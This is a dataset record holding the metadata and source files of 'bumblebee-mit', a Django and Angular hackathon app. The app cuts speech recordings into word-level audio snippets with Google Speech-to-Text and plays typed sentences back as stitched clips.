repo_name (stringlengths 5–114) | repo_url (stringlengths 24–133) | snapshot_id (stringlengths 40) | revision_id (stringlengths 40) | directory_id (stringlengths 40) | branch_name (stringclasses 209 values) | visit_date (timestamp[ns]) | revision_date (timestamp[ns]) | committer_date (timestamp[ns]) | github_id (int64 9.83k–683M, ⌀ allowed) | star_events_count (int64 0–22.6k) | fork_events_count (int64 0–4.15k) | gha_license_id (stringclasses 17 values) | gha_created_at (timestamp[ns]) | gha_updated_at (timestamp[ns]) | gha_pushed_at (timestamp[ns]) | gha_language (stringclasses 115 values) | files (listlengths 1–13.2k) | num_files (int64 1–13.2k) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cchyung/bumblebee-mit | https://github.com/cchyung/bumblebee-mit | f62c2384cd33ea8c5fb576e581a566c3326b8be1 | 0505f3eecd2139fdfaecea1177d395545751b987 | ea2d3bb5f9d65850f14d287e5d0cf9b573e76408 | refs/heads/master | 2018-12-19T20:54:07.946635 | 2018-09-21T19:19:40 | 2018-09-21T19:19:40 | 148,916,218 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6593406796455383,
"alphanum_fraction": 0.6593406796455383,
"avg_line_length": 44,
"blob_id": "dd781447ee4cfc5c098a6b45429d83c62c9cac4e",
"content_id": "7ccfcabdd9524899e9a589a3025d61b77e66cf73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 2,
"path": "/api/signedurl.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "def public_url(file):\n return file.replace(\"gs://\", \"https://storage.googleapis.com/\")\n\n"
},
{
"alpha_fraction": 0.7117646932601929,
"alphanum_fraction": 0.7117646932601929,
"avg_line_length": 23.428571701049805,
"blob_id": "487724f0ae38cc7f6278d5a3f244342cdb949dea",
"content_id": "50bcb385ff866015ebb1f903bea4ded62a53927c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 7,
"path": "/api/urls.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url, include\nfrom api import views\n\nurlpatterns = [\n url(r'^process', views.process),\n url(r'^get-snippets', views.get_more_snippets)\n]"
},
{
"alpha_fraction": 0.5137500166893005,
"alphanum_fraction": 0.7087500095367432,
"avg_line_length": 17.604650497436523,
"blob_id": "4e6936dcfbb1de29eb9a6b4927c6fb0d0a6db894",
"content_id": "91f2cc3dfc3fb094260350b388399f41bf874f1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 43,
"path": "/requirements.txt",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "astroid==1.6.5\nbackports.functools-lru-cache==1.5\ncachetools==2.1.0\ncertifi==2018.8.24\nchardet==3.0.4\nconfigparser==3.5.0\nDjango==1.11.15\ndjango-extensions==2.1.2\ndjangorestframework==3.8.2\nenum34==1.1.6\nffmpy==0.2.2\nfutures==3.2.0\ngoogle-api-core==1.4.0\ngoogle-auth==1.5.1\ngoogle-cloud-core==0.28.1\ngoogle-cloud-speech==0.36.0\ngoogle-cloud-storage==1.12.0\ngoogle-resumable-media==0.3.1\ngoogleapis-common-protos==1.5.3\ngrpcio==1.15.0\ngunicorn==19.9.0\nhttplib2==0.11.3\nidna==2.7\nisort==4.3.4\nlazy-object-proxy==1.3.1\nmccabe==0.6.1\nnumpy==1.15.1\noauth2client==4.1.3\nprotobuf==3.6.1\npsycopg2-binary==2.7.5\npyasn1==0.4.4\npyasn1-modules==0.2.2\npydub==0.22.1\npylint==1.9.3\npytz==2018.5\nrequests==2.19.1\nrsa==3.4.2\nscipy==1.1.0\nsingledispatch==3.4.0.3\nsix==1.11.0\ntyping==3.6.6\nurllib3==1.23\nwrapt==1.10.11\n"
},
{
"alpha_fraction": 0.6873449087142944,
"alphanum_fraction": 0.6873449087142944,
"avg_line_length": 30,
"blob_id": "bdfdb82734f457bd1e2a988e0a8f08fd75bc1965",
"content_id": "de432b4e3d303c8f4a5e8b82347cc87b8c4278b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 26,
"path": "/frontend/bumblebee-frontend/src/app/http.service.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { HttpClient, HttpHeaders, HttpParams} from '@angular/common/http';\nimport {Snippet, SnippetListItem} from './snippet';\nimport {Observable} from 'rxjs';\n\n@Injectable({\n providedIn: 'root'\n})\nexport class HttpService {\n\n private baseUrl = 'api';\n\n constructor(private http: HttpClient) { }\n\n processSentence(sentence: string): Observable<SnippetListItem[]> {\n const url = `${this.baseUrl}/process-sentence`;\n return this.http.get<SnippetListItem[]>(url, {params: {query: sentence}});\n }\n\n getSnippets(word: string): Observable<Snippet[]> {\n const url = `${this.baseUrl}/get-snippets`;\n const params: HttpParams = new HttpParams();\n params.append('query', word);\n return this.http.get<Snippet[]>(url, {params: {query: word}});\n }\n}\n"
},
{
"alpha_fraction": 0.65329509973526,
"alphanum_fraction": 0.670487105846405,
"avg_line_length": 14.17391300201416,
"blob_id": "4fb5b8d6e486ca44fe629ff113dc378d9c3fe343",
"content_id": "594b7e18b727625f262794d611f9f8f887890726",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 23,
"path": "/bumblebee.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import os\nimport re\nimport time\nfrom flask import Flask, request, jsonify, g\nfrom datetime import datetime\nimport traceback\n\nfrom werkzeug.exceptions import HTTPException\n\n\n\napp = Flask(__name__)\[email protected]('/healthz')\ndef healthz():\n return \"ok\", 200\n\[email protected]('/')\ndef index():\n return \"ok\", 200\n\n\nif __name__ == \"__main__\":\n app.run()\n"
},
{
"alpha_fraction": 0.5481171607971191,
"alphanum_fraction": 0.5481171607971191,
"avg_line_length": 18.15999984741211,
"blob_id": "6e3097f196d9842473fc7d19c9aaa254ad0fc9a9",
"content_id": "73d239277dd86aacc55dc4a085a4f0951b3d9760",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/api/serializers.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\nfrom api import models\n\n\nclass AudioSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.Audio\n fields = (\n 'name',\n 'description'\n )\n\n\nclass SnippetSerializer(serializers.ModelSerializer):\n audio = AudioSerializer()\n\n class Meta:\n model = models.Snippet\n fields = (\n 'audio',\n 'start',\n 'end',\n 'url'\n )"
},
{
"alpha_fraction": 0.5877240896224976,
"alphanum_fraction": 0.5909831523895264,
"avg_line_length": 32.490909576416016,
"blob_id": "a3e7a33d20dfdbf5005c001b92b2ccc3d3f826b1",
"content_id": "3a45a561c698945b564baca608e38505fd9cd294",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1841,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 55,
"path": "/api/upload_audio.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import os\nfrom api import models\nfrom google.cloud import storage\n\nGCS_BUCKET = \"bumblebee-audiofiles\"\nGCS_RAW_PATH = \"raw\"\nGCS_SNIPPET_PATH = \"snippets\"\nLOCAL_FILE_PATH = '/Users/connerchyung/Desktop/to-upload'\n\n\ndef upload_snippets():\n for file_name in os.listdir(LOCAL_FILE_PATH):\n\n if file_name is not '.DS_Store':\n split_file_name = file_name.split('_')\n word_string = split_file_name[0]\n audio_file = split_file_name[1]\n\n\n try:\n word = models.Word.objects.get(value=word_string)\n except models.Word.DoesNotExist:\n word = models.Word(value=word_string)\n word.save()\n\n try:\n audio = models.Audio.objects.get(name=audio_file)\n except models.Audio.DoesNotExist:\n audio = None\n\n if not audio:\n # make fake audio file\n audio = models.Audio(name=audio_file, url='localhost', description=audio_file)\n audio.save()\n\n # upload snippet\n snippet_file_name = \"%s/%s_%s_%s_%s\" % (GCS_SNIPPET_PATH, word_string, '0', '1', file_name)\n upload_blob(GCS_BUCKET, file_name, snippet_file_name)\n\n gcs_uri = 'gs://%s/%s' % (GCS_BUCKET, snippet_file_name)\n snippet = models.Snippet(word=word, audio=audio, start=0, end=1, url=gcs_uri)\n snippet.save()\n\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(LOCAL_FILE_PATH + '/' + source_file_name)\n\n print('File {} uploaded to {}.'.format(\n source_file_name,\n destination_blob_name))"
},
{
"alpha_fraction": 0.6878612637519836,
"alphanum_fraction": 0.7341040372848511,
"avg_line_length": 23.714284896850586,
"blob_id": "8088958a9ef79366d0e9071737606d71e37d3865",
"content_id": "5b46cc9054601da828b8a215062778c7ca3c123d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 7,
"path": "/build.sh",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ndocker build --tag us.gcr.io/bumblebee-mit/bumblebee:0.0.15 .\n\ngcloud docker -- push us.gcr.io/bumblebee-mit/bumblebee:0.0.15\n\nkubectl apply -f kubernetes.yml\n"
},
{
"alpha_fraction": 0.5766990184783936,
"alphanum_fraction": 0.582524299621582,
"avg_line_length": 18.80769157409668,
"blob_id": "c5b05fa54653c237c25408dd2b65912ce2a27856",
"content_id": "4ae30381e6d71f1a4d923a1108686012a232bf84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 26,
"path": "/frontend/bumblebee-frontend/src/app/app.component.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\ndeclare var $: any;\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent implements OnInit {\n title = 'bumblebee-frontend';\n\n ngOnInit() {\n $(window).resize(function () {\n this.resizeDiv();\n });\n\n this.resizeDiv();\n }\n\n resizeDiv() {\n const vph = $(window).height();\n if (vph > 500) {\n $('.auto-resize').css({'height': vph + 'px'});\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6112877726554871,
"alphanum_fraction": 0.61883944272995,
"avg_line_length": 23.66666603088379,
"blob_id": "7ec6fc0927f43f5ad516aa0837aa89d45f04cf42",
"content_id": "77dd2b70a30bc40f92d084fa1557351a91faa47f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 2516,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 102,
"path": "/frontend/bumblebee-frontend/src/app/home/home.component.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport {HttpService} from '../http.service';\nimport {Snippet, SnippetListItem} from '../snippet';\n\n@Component({\n selector: 'app-home',\n templateUrl: './home.component.html',\n styleUrls: ['./home.component.css']\n})\nexport class HomeComponent implements OnInit {\n state = 0;\n wordToReplace = 0;\n snippets: SnippetListItem[];\n newSnippets: Snippet[]; // contains the new snippets if user wants to replace a word\n audioFiles = [];\n\n /*\n State explanation:\n 0: main screen\n 1: loading spinner\n 2: display sentence and play button\n 3: display alternatives\n */\n\n constructor(private httpService: HttpService) { }\n\n ngOnInit() {\n this.state = 0;\n }\n\n processSentence(sentence: string): void {\n this.httpService.processSentence(sentence).subscribe(\n snippets => {\n this.snippets = snippets;\n console.log(snippets);\n this.loadAudio();\n }\n );\n this.state = 1;\n }\n\n loadAudio(): void {\n for (const snippet of this.snippets) {\n const audio = new Audio();\n if (snippet.snippet) {\n audio.src = snippet.snippet.url;\n audio.load(); // load audio file and push\n this.audioFiles.push(audio);\n console.log(this.audioFiles);\n }\n }\n this.state = 2;\n }\n\n playSentence(): void {\n console.log('playSentence()');\n this.playWord(0);\n }\n\n playWord(index: number): void {\n if (index === this.audioFiles.length) {\n return;\n } else {\n const audio = this.audioFiles[index];\n audio.play();\n setTimeout(() => {\n this.playWord(index + 1);\n }, audio.duration * 900);\n }\n }\n\n startOver(): void {\n this.state = 0;\n this.audioFiles = [];\n this.newSnippets = [];\n this.snippets = [];\n }\n\n getNewSnippets(index: number, word: string): void {\n this.state = 1; // show small loading spinner\n this.wordToReplace = index;\n this.httpService.getSnippets(word).subscribe(\n snippets => {\n this.newSnippets = snippets;\n this.state = 3;\n }\n );\n }\n\n updateSnippet(index: number): void {\n console.log(`updating word ${this.wordToReplace} : ${this.snippets[this.wordToReplace].word} to ${this.newSnippets[index].audio.name}`);\n this.snippets[this.wordToReplace] = new SnippetListItem(this.snippets[this.wordToReplace].word, this.newSnippets[index]);\n this.state = 2;\n this.audioFiles = []\n this.loadAudio();\n }\n\n closeAlternatives(): void {\n this.state = 2;\n }\n\n}\n"
},
{
"alpha_fraction": 0.7449209690093994,
"alphanum_fraction": 0.7516930103302002,
"avg_line_length": 67.15384674072266,
"blob_id": "cbb1b11c4efcb0b3d014e8a69488ad944c020543",
"content_id": "ea0b931307fdc48d03086379110527a2a8918017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 886,
"license_type": "no_license",
"max_line_length": 279,
"num_lines": 13,
"path": "/README.md",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# bumbl-b\n<img src=\"media/banner.png\" width=550 height=250>\n\nBumbl-B is a project built by [me](https://github.com/cchyung), [@DrewParsons](https://github.com/DrewParsons), and [@markhuds](https://github.com/markhuds).\n\nInspired by the lovable yellow transformer, Bumblebee, who has to rely on the radio to speak, **Bumbl-B** searches a database of word-indexed audio files to tranform a sentence or phrase into a string of audio compiled of president's speeches, vines, famous interviews, and more!\n\nAudio files were indexed using Google's [Speech to Text API](https://cloud.google.com/speech-to-text/).\n\nThe backend is built with [`django`](https://github.com/django/django) and [`django-rest-framework`](https://github.com/encode/django-rest-framework), and the frontend is built in [`angular`](https://github.com/angular/angular).\n\n## Screen Cap\n\n"
},
{
"alpha_fraction": 0.5288518667221069,
"alphanum_fraction": 0.5478881597518921,
"avg_line_length": 34.02083206176758,
"blob_id": "5154cc662d0c2df8f7444fd1e80af4259b0bc72e",
"content_id": "d52d37b64ae1cafb3e1aec40d12f4d200895f53e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1681,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 48,
"path": "/api/migrations/0001_initial.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.15 on 2018-09-15 16:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Audio',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('url', models.URLField(max_length=300)),\n ('description', models.CharField(blank=True, max_length=500)),\n ],\n ),\n migrations.CreateModel(\n name='Snippet',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('start', models.IntegerField()),\n ('end', models.IntegerField()),\n ('url', models.URLField(max_length=300)),\n ('audio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Audio')),\n ],\n ),\n migrations.CreateModel(\n name='Word',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('value', models.CharField(max_length=20)),\n ],\n ),\n migrations.AddField(\n model_name='snippet',\n name='word',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Word'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6355971693992615,
"alphanum_fraction": 0.6365339756011963,
"avg_line_length": 26.371795654296875,
"blob_id": "a3be578ffd0799f0c321ccb3732ee7209ea08f79",
"content_id": "4da997d9d1ad37cc0c842300f6f98f44e7e75610",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2135,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 78,
"path": "/api/views.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.shortcuts import render\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom api import signedurl\n\nfrom api import models, serializers\n\ndef sign_snippet(snippet):\n signed_url = signedurl.public_url(snippet['url'].replace(\"gs://\", \"https://storage.googleapis.com/\"))\n\n signed_snippet = {\n 'url': signed_url,\n 'audio': snippet['audio'],\n 'start': snippet['start'],\n 'end': snippet['end']\n }\n\n return signed_snippet\n\n@api_view(['GET'])\ndef process(request):\n \"\"\"\n processes a sentence and returns an ordered list of snippets\n \"\"\"\n sentence = request.GET.get('query')\n words = sentence.split(\" \")\n\n response = []\n\n for word in words:\n try:\n word_object = models.Word.objects.get(value=word)\n except models.Word.DoesNotExist:\n word_object = None\n\n if word_object is not None:\n snippet = models.Snippet.objects.filter(word=word_object).first()\n serializer = serializers.SnippetSerializer(snippet)\n\n signed_snippet = sign_snippet(serializer.data)\n\n response.append({'word': word, 'snippet': signed_snippet})\n else:\n response.append({'word': word, 'snippet': None})\n\n # return snippets\n return Response(response)\n\n\n@api_view(['GET'])\ndef get_more_snippets(request):\n \"\"\"\n gets another list of snippets that have this word\n \"\"\"\n word = request.GET.get('query')\n\n response = []\n\n try:\n word_object = models.Word.objects.get(value=word)\n except models.Word.DoesNotExist:\n word_object = None\n\n if word_object is not None:\n snippets = models.Snippet.objects.filter(word=word_object)[:5]\n\n for snippet in snippets:\n serializer = serializers.SnippetSerializer(snippet)\n signed_snippet = sign_snippet(serializer.data)\n response.append(signed_snippet)\n\n # return snippets\n return (Response(\n response\n ))\n"
},
{
"alpha_fraction": 0.7637795209884644,
"alphanum_fraction": 0.7677165269851685,
"avg_line_length": 24.399999618530273,
"blob_id": "1939a7941783c9227b53a80b539dd2626ba664f6",
"content_id": "f97edfc5214bf6c917beb1cb88422ec1e8e2f40a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 10,
"path": "/api/admin.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom api import models\n\nfrom django.contrib import admin\n\n# Register your models here.\nadmin.site.register(models.Audio)\nadmin.site.register(models.Snippet)\nadmin.site.register(models.Word)\n"
},
{
"alpha_fraction": 0.6552901268005371,
"alphanum_fraction": 0.6552901268005371,
"avg_line_length": 15.277777671813965,
"blob_id": "144aa8ab2feb1ee2f2aec858178d35f690f96a43",
"content_id": "13604f5d8c27cae07fd3f618bea140af64571e66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 18,
"path": "/frontend/bumblebee-frontend/src/app/snippet.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import {Audio} from './audio';\n\nexport class Snippet {\n audio: Audio;\n start: number;\n end: number;\n url: string;\n}\n\nexport class SnippetListItem {\n word: string;\n snippet: Snippet;\n\n constructor(word: string, snippet: Snippet) {\n this.word = word;\n this.snippet = snippet;\n }\n}\n"
},
{
"alpha_fraction": 0.6848920583724976,
"alphanum_fraction": 0.6848920583724976,
"avg_line_length": 30.590909957885742,
"blob_id": "f720f76bac9f42e70635d047575cf92a241cb42a",
"content_id": "818553f937d91edeb39e297048c25ef37f4eb6ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 22,
"path": "/api/db_util.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "from api.models import Snippet, Word, Audio\nfrom api import models\n\n\ndef create_snippet(word, rawUrl, url, starttime, endtime):\n try:\n word_object = Word.objects.get(value=word)\n except models.Word.DoesNotExist:\n word_object = Word(value=word)\n word_object.save()\n\n audio_object = Audio.objects.get(url=rawUrl)\n new_Snippet = Snippet(word=word_object, audio=audio_object, start=starttime, end=endtime, url=url)\n new_Snippet.save()\n print \"Saved \\\"%s\\\" Snippet to database\" % word\n\n\ndef create_audio(name, url, description):\n audio = Audio(name=name, url=url, description=description)\n audio.save()\n\n print \"Saved Audio \\\"%s\\\" to database\" % audio\n"
},
{
"alpha_fraction": 0.7459016442298889,
"alphanum_fraction": 0.7540983557701111,
"avg_line_length": 22.238094329833984,
"blob_id": "75d2c27e4b88245432416460da019b872fa5466d",
"content_id": "0d335a42a6b7fd649aeafd61a93634e6c830c1d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 488,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/Dockerfile",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "FROM google/cloud-sdk:slim\n\n\nCOPY entrypoint.sh entrypoint.sh\nCOPY gunicorn.config gunicorn.config\nCOPY requirements.txt requirements.txt\nCOPY bumblebee_backend bumblebee_backend\nCOPY api api\nCOPY manage.py manage.py\nRUN chmod u+x entrypoint.sh\n\nRUN apt-get update && \\\n apt-get --no-install-recommends -y install vim gettext && \\\n rm -rf /var/lib/apt/lists/* && \\\n pip install -r requirements.txt\n\nRUN python manage.py collectstatic\n\nEXPOSE 5432\n\nENTRYPOINT [\"./entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6513441205024719,
"alphanum_fraction": 0.6630412340164185,
"avg_line_length": 33.80714416503906,
"blob_id": "0b23f0c4bdaa98141518c748139982df1af25212",
"content_id": "7a09ba0f52dd90dfb298aded19d9369f54c3c541",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4873,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 140,
"path": "/api/batch_snippifier.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import io\nimport os\n\nfrom pydub import AudioSegment\nfrom pydub.utils import mediainfo\nfrom google.cloud import speech\nfrom google.cloud.speech import enums\nfrom google.cloud.speech import types\n\nfrom google.cloud import storage\n\nfrom api import db_util\n\nimport ffmpy\n\nGCS_BUCKET = \"bumblebee-audiofiles\"\nGCS_RAW_PATH = \"raw\"\nGCS_SNIPPET_PATH = \"snippets\"\nLOCAL_RAW_PATH = GCS_RAW_PATH\nLOCAL_SNIPPET_PATH = GCS_SNIPPET_PATH\n\ndef speed_change(sound, speed=1.0):\n # Manually override the frame_rate. This tells the computer how many\n # samples to play per second\n sound_with_altered_frame_rate = sound._spawn(sound.raw_data, overrides={\n \"frame_rate\": int(sound.frame_rate * speed)\n })\n # convert the sound with altered frame rate to a standard frame rate\n # so that regular playback programs will work right. They often only\n # know how to play audio at standard frame rate (like 44.1k)\n return sound_with_altered_frame_rate.set_frame_rate(sound.frame_rate)\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print('File {} uploaded to {}.'.format(\n source_file_name,\n destination_blob_name))\n\ndef download_blob(bucket_name, source_blob_name, destination_file_name):\n \"\"\"Downloads a blob from the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print('Blob {} downloaded to {}.'.format(\n source_blob_name,\n destination_file_name))\n\ndef convert_to_wav(file_name):\n wav_name = file_name.replace(\".mp3\", \".wav\")\n sound = AudioSegment.from_mp3(file_name).set_channels(1)\n # sound = speed_change(sound, 0.7)\n sound.export(wav_name, format=\"wav\")\n upload_blob(GCS_BUCKET, wav_name, wav_name)\n return wav_name\n\n\ndef get_word_infos(file_name):\n gcs_uri = 'gs://%s/%s' % (GCS_BUCKET, file_name)\n\n speech_client = speech.SpeechClient()\n\n audio = types.RecognitionAudio(uri=gcs_uri)\n config = types.RecognitionConfig(\n language_code='en-US',\n enable_word_time_offsets=True,\n model=\"video\"\n )\n\n operation = speech_client.long_running_recognize(config, audio)\n\n print('Waiting for operation to complete...')\n response = operation.result(timeout=900)\n\n word_infos = []\n for result in response.results:\n for alternative in result.alternatives:\n for word_info in alternative.words:\n word_infos.append({\n \"word\": word_info.word,\n \"start\": word_info.start_time.seconds + word_info.start_time.nanos / 1000000000.0,\n \"end\": word_info.end_time.seconds + word_info.end_time.nanos / 1000000000.0 + 0.2\n })\n return word_infos\n\ndef generate_snippet(file_name, word_info):\n source = AudioSegment.from_wav(file_name)\n snippet = source[word_info[\"start\"]*1000.0:word_info[\"end\"]*1000.0]\n # snippet = speed_change(snippet, (1/0.7))\n snippet_file_name = \"%s/%s_%s_%s_%s\" % (GCS_SNIPPET_PATH ,word_info[\"word\"], str(word_info[\"start\"]), str(word_info[\"end\"]), file_name.split(\"/\")[1])\n snippet.export(snippet_file_name, format=\"wav\")\n return snippet_file_name\n\n\n # '''\n # 1. ) Convert an audio file to single channel wav\n # 2. ) Submit each file to Google Speech API\n # 3. ) Use start and end values to trim audio files into one word snippets\n # 4. 
) Upload snippets to GCS\n # 5. ) Call Drew's function to add snippet info to DB\n # '''\ndef process_file(file_name):\n file_name = convert_to_wav(file_name)\n word_infos = get_word_infos(file_name)\n\n raw_url = \"gs://%s/%s\" % (GCS_BUCKET, file_name)\n\n formatted_file_name = file_name.replace(\".mp3\", \"\")\n db_util.create_audio(formatted_file_name, raw_url, \"\")\n\n for word_info in word_infos:\n snippet_file_name = generate_snippet(file_name, word_info)\n upload_blob(GCS_BUCKET, snippet_file_name, snippet_file_name)\n\n snippet_url = \"gs://%s/%s\" % (GCS_BUCKET, snippet_file_name)\n\n db_util.create_snippet(word_info[\"word\"], raw_url, snippet_url, int(word_info[\"start\"]), int(word_info[\"end\"]))\n\ndef start():\n if not os.path.exists(LOCAL_RAW_PATH):\n os.makedirs(LOCAL_RAW_PATH)\n\n if not os.path.exists(LOCAL_SNIPPET_PATH):\n os.makedirs(LOCAL_SNIPPET_PATH)\n\n client = storage.Client()\n bucket=client.get_bucket(GCS_BUCKET)\n blobs=list(bucket.list_blobs(prefix=GCS_RAW_PATH))\n for blob in blobs:\n if(not blob.name.endswith(\"/\")):\n blob.download_to_filename(blob.name)\n process_file(blob.name)\n"
},
{
"alpha_fraction": 0.8133333325386047,
"alphanum_fraction": 0.8133333325386047,
"avg_line_length": 36.5,
"blob_id": "8a73d5ca02ff1bfa1a7fa522f69c1318f8de74a0",
"content_id": "3ee0dcb99b9f743999b6cab28645297f2e6a0acc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 2,
"path": "/entrypoint.sh",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\ngunicorn -c gunicorn.config bumblebee_backend.wsgi:application\n"
},
{
"alpha_fraction": 0.6319095492362976,
"alphanum_fraction": 0.6507537961006165,
"avg_line_length": 23.121212005615234,
"blob_id": "ed73168b5effaca351b42653483ad7a12e8ae65e",
"content_id": "62ec6edd15b27e7dc927e75e794f9d4b36d9cf36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/api/models.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\n# Create your models here.\nclass Audio(models.Model):\n name = models.CharField(max_length=100, blank=False)\n url = models.URLField(max_length=300)\n description = models.CharField(max_length=500, blank=True)\n\n def __str__(self):\n return self.name\n\n\n\nclass Word(models.Model):\n value = models.CharField(max_length=20, blank=False)\n\n def __str__(self):\n return self.value\n\n\nclass Snippet(models.Model):\n word = models.ForeignKey(Word)\n audio = models.ForeignKey(Audio)\n start = models.IntegerField()\n end = models.IntegerField()\n url = models.URLField(max_length=300)\n\n def __str__(self):\n return self.audio.__str__() + \" \" + self.word.__str__()\n"
}
] | 20 |
